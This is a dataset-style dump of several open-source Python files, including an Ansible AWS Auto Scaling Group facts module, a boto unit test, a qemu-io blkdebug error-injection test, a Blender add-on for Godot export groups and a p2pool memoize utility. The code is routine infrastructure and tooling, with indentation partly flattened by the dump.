repo_name (stringlengths 5–100) | ref (stringlengths 12–67) | path (stringlengths 4–244) | copies (stringlengths 1–8) | content (stringlengths 0–1.05M, ⌀ = nullable)
---|---|---|---|---|
crafty78/ansible
|
refs/heads/devel
|
lib/ansible/modules/cloud/amazon/ec2_asg_facts.py
|
9
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: ec2_asg_facts
short_description: Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
description:
- Gather facts about ec2 Auto Scaling Groups (ASGs) in AWS
version_added: "2.2"
author: "Rob White (@wimnat)"
options:
name:
description:
- The prefix or name of the auto scaling group(s) you are searching for.
- "Note: This is a regular expression match with implicit '^' (beginning of string). Append '$' for a complete name match."
required: false
tags:
description:
- "A dictionary/hash of tags in the format { tag1_name: 'tag1_value', tag2_name: 'tag2_value' } to match against the auto scaling group(s) you are searching for."
required: false
extends_documentation_fragment:
- aws
- ec2
'''
EXAMPLES = '''
# Note: These examples do not set authentication details, see the AWS Guide for details.
# Find all groups
- ec2_asg_facts:
register: asgs
# Find a group with matching name/prefix
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
# Find a group with matching tags
- ec2_asg_facts:
tags:
project: webapp
env: production
register: asgs
# Find a group with matching name/prefix and tags
- ec2_asg_facts:
name: myproject
tags:
env: production
register: asgs
# Fail if no groups are found
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
failed_when: "{{ asgs.results | length == 0 }}"
# Fail if more than 1 group is found
- ec2_asg_facts:
name: public-webserver-asg
register: asgs
failed_when: "{{ asgs.results | length > 1 }}"
'''
RETURN = '''
---
auto_scaling_group_arn:
description: The Amazon Resource Name of the ASG
returned: success
type: string
sample: "arn:aws:autoscaling:us-west-2:1234567890:autoScalingGroup:10787c52-0bcb-427d-82ba-c8e4b008ed2e:autoScalingGroupName/public-webapp-production-1"
auto_scaling_group_name:
description: Name of autoscaling group
returned: success
type: str
sample: "public-webapp-production-1"
availability_zones:
description: List of Availability Zones that are enabled for this ASG.
returned: success
type: list
sample: ["us-west-2a", "us-west-2b", "us-west-2a"]
created_time:
description: The date and time this ASG was created, in ISO 8601 format.
returned: success
type: string
sample: "2015-11-25T00:05:36.309Z"
default_cooldown:
description: The default cooldown time in seconds.
returned: success
type: int
sample: 300
desired_capacity:
description: The number of EC2 instances that should be running in this group.
returned: success
type: int
sample: 3
health_check_period:
description: Length of time in seconds after a new EC2 instance comes into service that Auto Scaling starts checking its health.
returned: success
type: int
sample: 30
health_check_type:
description: The service you want the health status from, one of "EC2" or "ELB".
returned: success
type: str
sample: "ELB"
instances:
description: List of EC2 instances and their status as it relates to the ASG.
returned: success
type: list
sample: [
{
"availability_zone": "us-west-2a",
"health_status": "Healthy",
"instance_id": "i-es22ad25",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": "false"
}
]
launch_configuration_name:
description: Name of launch configuration associated with the ASG.
returned: success
type: str
sample: "public-webapp-production-1"
load_balancer_names:
    description: List of load balancer names attached to the ASG.
returned: success
type: list
sample: ["elb-webapp-prod"]
max_size:
description: Maximum size of group
returned: success
type: int
sample: 3
min_size:
description: Minimum size of group
returned: success
type: int
sample: 1
new_instances_protected_from_scale_in:
    description: Whether or not new instances are protected from automatic scale-in.
returned: success
type: boolean
sample: "false"
placement_group:
description: Placement group into which instances are launched, if any.
returned: success
type: str
sample: None
status:
description: The current state of the group when DeleteAutoScalingGroup is in progress.
returned: success
type: str
sample: None
tags:
description: List of tags for the ASG, and whether or not each tag propagates to instances at launch.
returned: success
type: list
sample: [
{
"key": "Name",
"value": "public-webapp-production-1",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
},
{
"key": "env",
"value": "production",
"resource_id": "public-webapp-production-1",
"resource_type": "auto-scaling-group",
"propagate_at_launch": "true"
}
]
termination_policies:
description: A list of termination policies for the group.
returned: success
    type: list
sample: ["Default"]
'''
try:
import boto3
from botocore.exceptions import ClientError
HAS_BOTO3 = True
except ImportError:
HAS_BOTO3 = False
def match_asg_tags(tags_to_match, asg):
    # Return True only when every requested tag key/value pair is present on the ASG.
    for key, value in tags_to_match.items():
        for tag in asg['Tags']:
            if key == tag['Key'] and value == tag['Value']:
                break
        else:
            # the inner loop found no tag matching this key/value pair
            return False
    return True
def find_asgs(conn, module, name=None, tags=None):
"""
    Args:
        conn (boto3.AutoScaling.Client): Valid Boto3 ASG client.
        module (AnsibleModule): Initialized Ansible module, used for error reporting.
        name (str): Optional name of the ASG you are looking for.
        tags (dict): Optional dictionary of tags and values to search for.
    Basic Usage:
        >>> name = 'public-webapp-production'
        >>> tags = { 'env': 'production' }
        >>> conn = boto3.client('autoscaling', region_name='us-west-2')
        >>> results = find_asgs(conn, module, name=name, tags=tags)
Returns:
List
[
{
"auto_scaling_group_arn": "arn:aws:autoscaling:us-west-2:275977225706:autoScalingGroup:58abc686-9783-4528-b338-3ad6f1cbbbaf:autoScalingGroupName/public-webapp-production",
"auto_scaling_group_name": "public-webapp-production",
"availability_zones": ["us-west-2c", "us-west-2b", "us-west-2a"],
"created_time": "2016-02-02T23:28:42.481000+00:00",
"default_cooldown": 300,
"desired_capacity": 2,
"enabled_metrics": [],
"health_check_grace_period": 300,
"health_check_type": "ELB",
"instances":
[
{
"availability_zone": "us-west-2c",
"health_status": "Healthy",
"instance_id": "i-047a12cb",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": false
},
{
"availability_zone": "us-west-2a",
"health_status": "Healthy",
"instance_id": "i-7a29df2c",
"launch_configuration_name": "public-webapp-production-1",
"lifecycle_state": "InService",
"protected_from_scale_in": false
}
],
"launch_configuration_name": "public-webapp-production-1",
"load_balancer_names": ["public-webapp-production-lb"],
"max_size": 4,
"min_size": 2,
"new_instances_protected_from_scale_in": false,
"placement_group": None,
"status": None,
"suspended_processes": [],
"tags":
[
{
"key": "Name",
"propagate_at_launch": true,
"resource_id": "public-webapp-production",
"resource_type": "auto-scaling-group",
"value": "public-webapp-production"
},
{
"key": "env",
"propagate_at_launch": true,
"resource_id": "public-webapp-production",
"resource_type": "auto-scaling-group",
"value": "production"
}
],
"termination_policies":
[
"Default"
],
"vpc_zone_identifier":
[
"subnet-a1b1c1d1",
"subnet-a2b2c2d2",
"subnet-a3b3c3d3"
]
}
]
"""
try:
asgs = conn.describe_auto_scaling_groups()
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
matched_asgs = []
    if name is not None:
        # the user supplied a name; compile it as a prefix-anchored regular expression
        name_prog = re.compile(r'^' + name)
for asg in asgs['AutoScalingGroups']:
if name:
matched_name = name_prog.search(asg['AutoScalingGroupName'])
else:
matched_name = True
if tags:
matched_tags = match_asg_tags(tags, asg)
else:
matched_tags = True
if matched_name and matched_tags:
matched_asgs.append(camel_dict_to_snake_dict(asg))
return matched_asgs
def main():
argument_spec = ec2_argument_spec()
argument_spec.update(
dict(
name=dict(type='str'),
tags=dict(type='dict'),
)
)
module = AnsibleModule(argument_spec=argument_spec)
if not HAS_BOTO3:
module.fail_json(msg='boto3 required for this module')
asg_name = module.params.get('name')
asg_tags = module.params.get('tags')
try:
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module, boto3=True)
autoscaling = boto3_conn(module, conn_type='client', resource='autoscaling', region=region, endpoint=ec2_url, **aws_connect_kwargs)
except ClientError as e:
module.fail_json(msg=e.message, **camel_dict_to_snake_dict(e.response))
results = find_asgs(autoscaling, module, name=asg_name, tags=asg_tags)
module.exit_json(results=results)
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.ec2 import *
if __name__ == '__main__':
main()
|
alfredodeza/boto
|
refs/heads/develop
|
tests/unit/machinelearning/test_machinelearning.py
|
91
|
# Copyright (c) 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
#
from boto.compat import json
from boto.machinelearning.layer1 import MachineLearningConnection
from tests.unit import AWSMockServiceTestCase
class TestMachineLearning(AWSMockServiceTestCase):
connection_class = MachineLearningConnection
def test_predict(self):
ml_endpoint = 'mymlmodel.amazonaws.com'
self.set_http_response(status_code=200, body=b'')
self.service_connection.predict(
ml_model_id='foo', record={'Foo': 'bar'},
predict_endpoint=ml_endpoint)
self.assertEqual(self.actual_request.host, ml_endpoint)
def test_predict_with_scheme_in_endpoint(self):
ml_endpoint = 'mymlmodel.amazonaws.com'
self.set_http_response(status_code=200, body=b'')
self.service_connection.predict(
ml_model_id='foo', record={'Foo': 'bar'},
predict_endpoint='https://' + ml_endpoint)
self.assertEqual(self.actual_request.host, ml_endpoint)
|
DeBortoliWines/Bika-LIMS
|
refs/heads/hotfix/next
|
bika/lims/upgrade/to3014.py
|
2
|
from Acquisition import aq_inner
from Acquisition import aq_parent
from bika.lims.permissions import *
def upgrade(tool):
portal = aq_parent(aq_inner(tool))
# missing /supplyorders folder permission
clients = portal.clients.objectValues()
for client in clients:
mp = client.manage_permission
mp(AddSupplyOrder, ['Manager', 'LabManager', 'Owner'], 0)
client.reindexObject()
return True
|
suqinhuang/virt-test
|
refs/heads/master
|
qemu/tests/qemu_io_blkdebug.py
|
1
|
import re, logging, ConfigParser
from autotest.client.shared import error
from virttest import qemu_io
from virttest import utils_misc
from virttest.qemu_storage import QemuImg
from autotest.client import utils
@error.context_aware
def run_qemu_io_blkdebug(test, params, env):
"""
Run qemu-io blkdebug tests:
1. Create image with given parameters
2. Write the blkdebug config file
3. Try to do operate in image with qemu-io and get the error message
4. Get the error message from perror by error number set in config file
5. Compare the error message
@param test: kvm test object
@param params: Dictionary with the test parameters
@param env: Dictionary with test environment.
"""
tmp_dir = params.get("tmp_dir", "/tmp")
blkdebug_cfg = utils_misc.get_path(tmp_dir, params.get("blkdebug_cfg",
"blkdebug.cfg"))
err_command = params["err_command"]
err_event = params["err_event"]
errn_list = re.split("\s+", params["errn_list"].strip())
re_std_msg = params["re_std_msg"]
test_timeout = int(params.get("test_timeout", "60"))
pre_err_commands = params.get("pre_err_commands")
image = params.get("images")
blkdebug_default = params.get("blkdebug_default")
error.context("Create image", logging.info)
image_io = QemuImg(params.object_params(image), test.bindir, image)
image_name = image_io.create(params.object_params(image))
template_name = utils_misc.get_path(test.virtdir, blkdebug_default)
template = ConfigParser.ConfigParser()
template.read(template_name)
for errn in errn_list:
log_filename = utils_misc.get_path(test.outputdir,
"qemu-io-log-%s" % errn)
error.context("Write the blkdebug config file", logging.info)
template.set("inject-error", "event", '"%s"' % err_event)
template.set("inject-error", "errno", '"%s"' % errn)
error.context("Write blkdebug config file", logging.info)
blkdebug = None
try:
blkdebug = open(blkdebug_cfg, 'w')
template.write(blkdebug)
finally:
if blkdebug is not None:
blkdebug.close()
error.context("Operate in qemu-io to trigger the error", logging.info)
session = qemu_io.QemuIOShellSession(test, params, image_name,
blkdebug_cfg=blkdebug_cfg,
log_filename=log_filename)
if pre_err_commands:
for cmd in re.split(",", pre_err_commands.strip()):
session.cmd_output(cmd, timeout=test_timeout)
output = session.cmd_output(err_command, timeout=test_timeout)
error.context("Get error message from command perror", logging.info)
perror_cmd = "perror %s" % errn
std_msg = utils.system_output(perror_cmd)
std_msg = re.findall(re_std_msg, std_msg)
if std_msg:
std_msg = std_msg[0]
else:
std_msg = ""
logging.warning("Can not find error message from perror")
session.close()
error.context("Compare the error message", logging.info)
if std_msg:
if std_msg in output:
logging.info("Error message is correct in qemu-io")
else:
fail_log = "The error message is mismatch:"
fail_log += "qemu-io reports: '%s'," % output
fail_log += "perror reports: '%s'" % std_msg
raise error.TestFail(fail_log)
else:
logging.warning("Can not find error message from perror."
" The output from qemu-io is %s" % output)
|
est31/godot
|
refs/heads/master
|
tools/export/blender25/godot_export_manager.py
|
13
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
# Script copyright (c) Andreas Esau
bl_info = {
"name": "Godot Export Manager",
"author": "Andreas Esau",
"version": (1, 0),
"blender": (2, 7, 0),
"location": "Scene Properties > Godot Export Manager",
"description": "Godot Export Manager uses the Better Collada Exporter to manage Export Groups and automatically export the objects groups to Collada Files.",
"warning": "",
"wiki_url": ("http://www.godotengine.org"),
"tracker_url": "",
"category": "Import-Export"}
import bpy
from bpy.props import StringProperty, BoolProperty, EnumProperty, FloatProperty, FloatVectorProperty, IntProperty, CollectionProperty, PointerProperty
import os
from bpy.app.handlers import persistent
from mathutils import Vector, Matrix
class godot_export_manager(bpy.types.Panel):
bl_label = "Godot Export Manager"
bl_space_type = 'PROPERTIES'
bl_region_type = 'WINDOW'
bl_context = "scene"
bpy.types.Scene.godot_export_on_save = BoolProperty(default=False)
### draw function for all ui elements
def draw(self, context):
layout = self.layout
split = self.layout.split()
scene = bpy.data.scenes[0]
ob = context.object
scene = context.scene
row = layout.row()
col = row.column()
col.prop(scene,"godot_export_on_save",text="Export Groups on save")
row = layout.row()
col = row.column(align=True)
op = col.operator("scene.godot_add_objects_to_group",text="Add selected objects to Group",icon="COPYDOWN")
op = col.operator("scene.godot_delete_objects_from_group",text="Delete selected objects from Group",icon="PASTEDOWN")
row = layout.row()
col = row.column()
col.label(text="Export Groups:")
row = layout.row()
col = row.column()
col.template_list("UI_List_Godot","dummy",scene, "godot_export_groups", scene, "godot_export_groups_index",rows=1,maxrows=10,type='DEFAULT')
col = row.column(align=True)
col.operator("scene.godot_add_export_group",text="",icon="ZOOMIN")
col.operator("scene.godot_delete_export_group",text="",icon="ZOOMOUT")
col.operator("scene.godot_export_all_groups",text="",icon="EXPORT")
if len(scene.godot_export_groups) > 0:
row = layout.row()
col = row.column()
group = scene.godot_export_groups[scene.godot_export_groups_index]
col.prop(group,"name",text="Group Name")
col.prop(group,"export_name",text="Export Name")
col.prop(group,"export_path",text="Export Filepath")
row = layout.row()
col = row.column()
row = layout.row()
col = row.column()
col.label(text="Export Settings:")
col = col.row(align=True)
col.prop(group,"apply_loc",toggle=True,icon="MAN_TRANS")
col.prop(group,"apply_rot",toggle=True,icon="MAN_ROT")
col.prop(group,"apply_scale",toggle=True,icon="MAN_SCALE")
row = layout.row()
col = row.column()
col.prop(group,"use_include_particle_duplicates")
col.prop(group,"use_mesh_modifiers")
col.prop(group,"use_tangent_arrays")
col.prop(group,"use_triangles")
col.prop(group,"use_copy_images")
col.prop(group,"use_active_layers")
col.prop(group,"use_anim")
col.prop(group,"use_anim_action_all")
col.prop(group,"use_anim_skip_noexp")
col.prop(group,"use_anim_optimize")
col.prop(group,"anim_optimize_precision")
col.prop(group,"use_metadata")
### Custom template_list look
class UI_List_Godot(bpy.types.UIList):
def draw_item(self, context, layout, data, item, icon, active_data, active_propname, index):
ob = data
slot = item
col = layout.row(align=True)
col.label(text=item.name,icon="GROUP")
col.prop(item,"active",text="")
op = col.operator("scene.godot_select_group_objects",text="",emboss=False,icon="RESTRICT_SELECT_OFF")
op.idx = index
op = col.operator("scene.godot_export_group",text="",emboss=False,icon="EXPORT")
op.idx = index
class add_objects_to_group(bpy.types.Operator):
bl_idname = "scene.godot_add_objects_to_group"
bl_label = "Add Objects to Group"
bl_description = "Adds the selected Objects to the active group below."
undo = BoolProperty(default=True)
def execute(self,context):
scene = context.scene
objects_str = ""
if len(scene.godot_export_groups) > 0:
for i,object in enumerate(context.selected_objects):
if object.name not in scene.godot_export_groups[scene.godot_export_groups_index].nodes:
node = scene.godot_export_groups[scene.godot_export_groups_index].nodes.add()
node.name = object.name
if i == 0:
objects_str += object.name
else:
objects_str += ", "+object.name
self.report({'INFO'}, objects_str + " added to group." )
if self.undo:
bpy.ops.ed.undo_push(message="Objects added to group")
else:
self.report({'WARNING'}, "Create a group first." )
return{'FINISHED'}
class del_objects_from_group(bpy.types.Operator):
bl_idname = "scene.godot_delete_objects_from_group"
bl_label = "Delete Objects from Group"
bl_description = "Delets the selected Objects from the active group below."
def execute(self,context):
scene = context.scene
if len(scene.godot_export_groups) > 0:
selected_objects = []
for object in context.selected_objects:
selected_objects.append(object.name)
objects_str = ""
j = 0
            for i,node in enumerate(scene.godot_export_groups[scene.godot_export_groups_index].nodes):
                if node.name in selected_objects:
                    scene.godot_export_groups[scene.godot_export_groups_index].nodes.remove(i)
                    if j == 0:
                        objects_str += node.name
                    else:
                        objects_str += ", "+node.name
                    j+=1
self.report({'INFO'}, objects_str + " deleted from group." )
bpy.ops.ed.undo_push(message="Objects deleted from group")
else:
self.report({'WARNING'}, "There is no group to delete from." )
return{'FINISHED'}
class select_group_objects(bpy.types.Operator):
bl_idname = "scene.godot_select_group_objects"
bl_label = "Select Group Objects"
bl_description = "Will select all group Objects in the scene."
idx = IntProperty()
def execute(self,context):
scene = context.scene
for object in context.scene.objects:
object.select = False
for node in scene.godot_export_groups[self.idx].nodes:
if node.name in bpy.data.objects:
bpy.data.objects[node.name].select = True
context.scene.objects.active = bpy.data.objects[node.name]
return{'FINISHED'}
class export_groups_autosave(bpy.types.Operator):
bl_idname = "scene.godot_export_groups_autosave"
bl_label = "Export All Groups"
bl_description = "Exports all groups to Collada."
def execute(self,context):
scene = context.scene
if scene.godot_export_on_save:
for i in range(len(scene.godot_export_groups)):
if scene.godot_export_groups[i].active:
bpy.ops.scene.godot_export_group(idx=i)
self.report({'INFO'}, "All Groups exported." )
bpy.ops.ed.undo_push(message="Export all Groups")
return{'FINISHED'}
class export_all_groups(bpy.types.Operator):
bl_idname = "scene.godot_export_all_groups"
bl_label = "Export All Groups"
bl_description = "Exports all groups to Collada."
def execute(self,context):
scene = context.scene
for i in range(0,len(scene.godot_export_groups)):
bpy.ops.scene.godot_export_group(idx=i,export_all=True)
self.report({'INFO'}, "All Groups exported." )
return{'FINISHED'}
class export_group(bpy.types.Operator):
bl_idname = "scene.godot_export_group"
bl_label = "Export Group"
bl_description = "Exports the active group to destination folder as Collada file."
idx = IntProperty(default=0)
export_all = BoolProperty(default=False)
def copy_object_recursive(self,ob,parent,single_user = True):
new_ob = bpy.data.objects[ob.name].copy()
if single_user or ob.type=="ARMATURE":
new_mesh_data = new_ob.data.copy()
new_ob.data = new_mesh_data
bpy.context.scene.objects.link(new_ob)
if ob != parent:
new_ob.parent = parent
else:
new_ob.parent = None
for child in ob.children:
self.copy_object_recursive(child,new_ob,single_user)
new_ob.select = True
return new_ob
def delete_object(self,ob):
if ob != None:
for child in ob.children:
self.delete_object(child)
bpy.context.scene.objects.unlink(ob)
bpy.data.objects.remove(ob)
def convert_group_to_node(self,group):
if group.dupli_group != None:
for object in group.dupli_group.objects:
if object.parent == None:
object = self.copy_object_recursive(object,object,True)
matrix = Matrix(object.matrix_local)
object.matrix_local = Matrix()
object.matrix_local *= group.matrix_local
object.matrix_local *= matrix
self.delete_object(group)
def execute(self,context):
scene = context.scene
group = context.scene.godot_export_groups
if not group[self.idx].active and self.export_all:
return{'FINISHED'}
for i,object in enumerate(group[self.idx].nodes):
if object.name in bpy.data.objects:
pass
else:
group[self.idx].nodes.remove(i)
bpy.ops.ed.undo_push(message="Clear not existent Group Nodes.")
path = group[self.idx].export_path
if (path.find("//")==0 or path.find("\\\\")==0):
#if relative, convert to absolute
path = bpy.path.abspath(path)
path = path.replace("\\","/")
### if path exists and group export name is set the group will be exported
if os.path.exists(path) and group[self.idx].export_name != "":
context.scene.layers = [True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True,True]
if group[self.idx].export_name.endswith(".dae"):
path = os.path.join(path,group[self.idx].export_name)
else:
path = os.path.join(path,group[self.idx].export_name+".dae")
hide_select = []
for object in context.scene.objects:
hide_select.append(object.hide_select)
object.hide_select = False
object.select = False
context.scene.objects.active = None
### make particle duplicates, parent and select them
nodes_to_be_added = []
if group[self.idx].use_include_particle_duplicates:
for i,object in enumerate(group[self.idx].nodes):
if bpy.data.objects[object.name].type != "EMPTY":
context.scene.objects.active = bpy.data.objects[object.name]
bpy.data.objects[object.name].select = True
bpy.ops.object.duplicates_make_real()
for object in context.selected_objects:
nodes_to_be_added.append(object)
bpy.ops.object.parent_set(type="OBJECT", keep_transform=False)
for object in context.selected_objects:
object.select = False
bpy.data.objects[object.name].select = False
context.scene.objects.active = None
for object in nodes_to_be_added:
object.select = True
### select all other nodes from the group
for i,object in enumerate(group[self.idx].nodes):
if bpy.data.objects[object.name].type == "EMPTY":
self.convert_group_to_node(bpy.data.objects[object.name])
else:
bpy.data.objects[object.name].select = True
bpy.ops.object.transform_apply(location=group[self.idx].apply_loc, rotation=group[self.idx].apply_rot, scale=group[self.idx].apply_scale)
bpy.ops.export_scene.dae(check_existing=True, filepath=path, filter_glob="*.dae", object_types=group[self.idx].object_types, use_export_selected=group[self.idx].use_export_selected, use_mesh_modifiers=group[self.idx].use_mesh_modifiers, use_tangent_arrays=group[self.idx].use_tangent_arrays, use_triangles=group[self.idx].use_triangles, use_copy_images=group[self.idx].use_copy_images, use_active_layers=group[self.idx].use_active_layers, use_anim=group[self.idx].use_anim, use_anim_action_all=group[self.idx].use_anim_action_all, use_anim_skip_noexp=group[self.idx].use_anim_skip_noexp, use_anim_optimize=group[self.idx].use_anim_optimize, anim_optimize_precision=group[self.idx].anim_optimize_precision, use_metadata=group[self.idx].use_metadata)
self.report({'INFO'}, '"'+group[self.idx].name+'"' + " Group exported." )
msg = "Export Group "+group[self.idx].name
bpy.ops.ed.undo_push(message="")
bpy.ops.ed.undo()
bpy.ops.ed.undo_push(message=msg)
else:
self.report({'INFO'}, "Define Export Name and Export Path." )
return{'FINISHED'}
class add_export_group(bpy.types.Operator):
bl_idname = "scene.godot_add_export_group"
bl_label = "Adds a new export Group"
bl_description = "Creates a new Export Group with the selected Objects assigned to it."
def execute(self,context):
scene = context.scene
item = scene.godot_export_groups.add()
item.name = "New Group"
for object in context.selected_objects:
node = item.nodes.add()
node.name = object.name
scene.godot_export_groups_index = len(scene.godot_export_groups)-1
bpy.ops.ed.undo_push(message="Create New Export Group")
return{'FINISHED'}
class del_export_group(bpy.types.Operator):
bl_idname = "scene.godot_delete_export_group"
bl_label = "Delets the selected export Group"
bl_description = "Delets the active Export Group."
def invoke(self, context, event):
wm = context.window_manager
return wm.invoke_confirm(self,event)
def execute(self,context):
scene = context.scene
scene.godot_export_groups.remove(scene.godot_export_groups_index)
if scene.godot_export_groups_index > 0:
scene.godot_export_groups_index -= 1
bpy.ops.ed.undo_push(message="Delete Export Group")
return{'FINISHED'}
class godot_node_list(bpy.types.PropertyGroup):
name = StringProperty()
class godot_export_groups(bpy.types.PropertyGroup):
name = StringProperty(name="Group Name")
export_name = StringProperty(name="scene_name")
nodes = CollectionProperty(type=godot_node_list)
export_path = StringProperty(subtype="DIR_PATH")
active = BoolProperty(default=True,description="Export Group")
object_types = EnumProperty(name="Object Types",options={'ENUM_FLAG'},items=(('EMPTY', "Empty", ""),('CAMERA', "Camera", ""),('LAMP', "Lamp", ""),('ARMATURE', "Armature", ""),('MESH', "Mesh", ""),('CURVE', "Curve", ""),),default={'EMPTY', 'CAMERA', 'LAMP', 'ARMATURE', 'MESH','CURVE'})
apply_scale = BoolProperty(name="Apply Scale",description="Apply Scale before export.",default=False)
apply_rot = BoolProperty(name="Apply Rotation",description="Apply Rotation before export.",default=False)
apply_loc = BoolProperty(name="Apply Location",description="Apply Location before export.",default=False)
use_export_selected = BoolProperty(name="Selected Objects",description="Export only selected objects (and visible in active layers if that applies).",default=True)
use_mesh_modifiers = BoolProperty(name="Apply Modifiers",description="Apply modifiers to mesh objects (on a copy!).",default=True)
use_tangent_arrays = BoolProperty(name="Tangent Arrays",description="Export Tangent and Binormal arrays (for normalmapping).",default=False)
use_triangles = BoolProperty(name="Triangulate",description="Export Triangles instead of Polygons.",default=False)
use_copy_images = BoolProperty(name="Copy Images",description="Copy Images (create images/ subfolder)",default=False)
use_active_layers = BoolProperty(name="Active Layers",description="Export only objects on the active layers.",default=True)
use_anim = BoolProperty(name="Export Animation",description="Export keyframe animation",default=False)
use_anim_action_all = BoolProperty(name="All Actions",description=("Export all actions for the first armature found in separate DAE files"),default=False)
    use_anim_skip_noexp = BoolProperty(name="Skip (-noexp) Actions",description="Skip exporting of actions whose names end in (-noexp). Useful to skip control animations.",default=True)
use_anim_optimize = BoolProperty(name="Optimize Keyframes",description="Remove double keyframes",default=True)
    anim_optimize_precision = FloatProperty(name="Precision",description=("Tolerance for comparing double keyframes (higher for greater accuracy)"),min=1, max=16,soft_min=1, soft_max=16,default=6.0)
use_metadata = BoolProperty(name="Use Metadata",default=True,options={'HIDDEN'})
use_include_particle_duplicates = BoolProperty(name="Include Particle Duplicates",default=True)
def register():
bpy.utils.register_class(godot_export_manager)
bpy.utils.register_class(godot_node_list)
bpy.utils.register_class(godot_export_groups)
bpy.utils.register_class(add_export_group)
bpy.utils.register_class(del_export_group)
bpy.utils.register_class(export_all_groups)
bpy.utils.register_class(export_groups_autosave)
bpy.utils.register_class(export_group)
bpy.utils.register_class(add_objects_to_group)
bpy.utils.register_class(del_objects_from_group)
bpy.utils.register_class(select_group_objects)
bpy.utils.register_class(UI_List_Godot)
bpy.types.Scene.godot_export_groups = CollectionProperty(type=godot_export_groups)
bpy.types.Scene.godot_export_groups_index = IntProperty(default=0,min=0)
def unregister():
bpy.utils.unregister_class(godot_export_manager)
bpy.utils.unregister_class(godot_node_list)
bpy.utils.unregister_class(godot_export_groups)
bpy.utils.unregister_class(export_groups_autosave)
bpy.utils.unregister_class(add_export_group)
bpy.utils.unregister_class(del_export_group)
bpy.utils.unregister_class(export_all_groups)
bpy.utils.unregister_class(export_group)
bpy.utils.unregister_class(add_objects_to_group)
bpy.utils.unregister_class(del_objects_from_group)
bpy.utils.unregister_class(select_group_objects)
bpy.utils.unregister_class(UI_List_Godot)
@persistent
def auto_export(dummy):
bpy.ops.scene.godot_export_groups_autosave()
bpy.app.handlers.save_post.append(auto_export)
if __name__ == "__main__":
register()
|
savoirfairelinux/OpenUpgrade
|
refs/heads/master
|
addons/web_analytics/__openerp__.py
|
62
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-2012 OpenERP s.a. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Google Analytics',
'version': '1.0',
'category': 'Tools',
'complexity': "easy",
'description': """
Google Analytics.
=================
Collects web application usage with Google Analytics.
""",
'author': 'OpenERP SA',
'website': 'http://openerp.com',
'depends': ['web'],
'data': [
'views/web_analytics.xml',
],
'installable': True,
'active': False,
}
|
q6654282/p2pool
|
refs/heads/master
|
p2pool/util/memoize.py
|
281
|
import itertools
class LRUDict(object):
def __init__(self, n):
self.n = n
self.inner = {}
self.counter = itertools.count()
def get(self, key, default=None):
if key in self.inner:
x, value = self.inner[key]
self.inner[key] = self.counter.next(), value
return value
return default
def __setitem__(self, key, value):
self.inner[key] = self.counter.next(), value
while len(self.inner) > self.n:
self.inner.pop(min(self.inner, key=lambda k: self.inner[k][0]))
_nothing = object()
def memoize_with_backing(backing, has_inverses=set()):
def a(f):
def b(*args):
res = backing.get((f, args), _nothing)
if res is not _nothing:
return res
res = f(*args)
backing[(f, args)] = res
for inverse in has_inverses:
backing[(inverse, args[:-1] + (res,))] = args[-1]
return res
return b
return a
def memoize(f):
return memoize_with_backing({})(f)
class cdict(dict):
def __init__(self, func):
dict.__init__(self)
